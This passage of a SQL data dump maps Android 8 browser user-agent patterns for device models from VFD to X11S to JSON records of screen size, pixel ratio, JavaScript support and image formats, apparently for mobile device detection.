Android 8.*; V8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VFD 527) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VFD 528) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VFD 529) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VFD 620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VFD 720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VFD 820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VFD320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VIA_G3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VIA_M4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VIE-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VIVAX_Fly_V1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VIVAX_PRO3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VK7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VKY-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VKY-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VLE5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VS987) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VS988) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VS995) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VS996) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VTR-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; VTR-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Venus E4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Venus GO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Venus V6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Venus Z10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Venus Z20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; View Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":755,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; View xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; View2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; View2 xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":764,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Vivo 4G_r) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Vivo XI PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Vivo XI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Vivo XL4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Vox V40 3G VT4055MG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W-K130-EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W-K130-OPE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W-K200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W-V600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W50A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W51S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W55HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WAS-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WAS-L03T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WAS-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WAS-LX1A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WAS-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WAS-LX2J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WAS-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WAS-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WC300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WC300SN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WP1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; WP2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_C200SN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_C800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":873,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_C800S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":873,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_C860) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":873,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_K300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_K300S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_K400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_K600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_P130) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_P200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; W_P200CM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Wallet) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-Style_S5501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-TIGI_V11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-TIGI_V15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-TIGI_V18 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-TIGI_V28 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-TIGI_V28) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-TIGI_V5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-TIGI_V9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-treme PQ53) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-treme_PQ20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-treme_PQ29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X-treme_PQ54) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X10S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X11S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 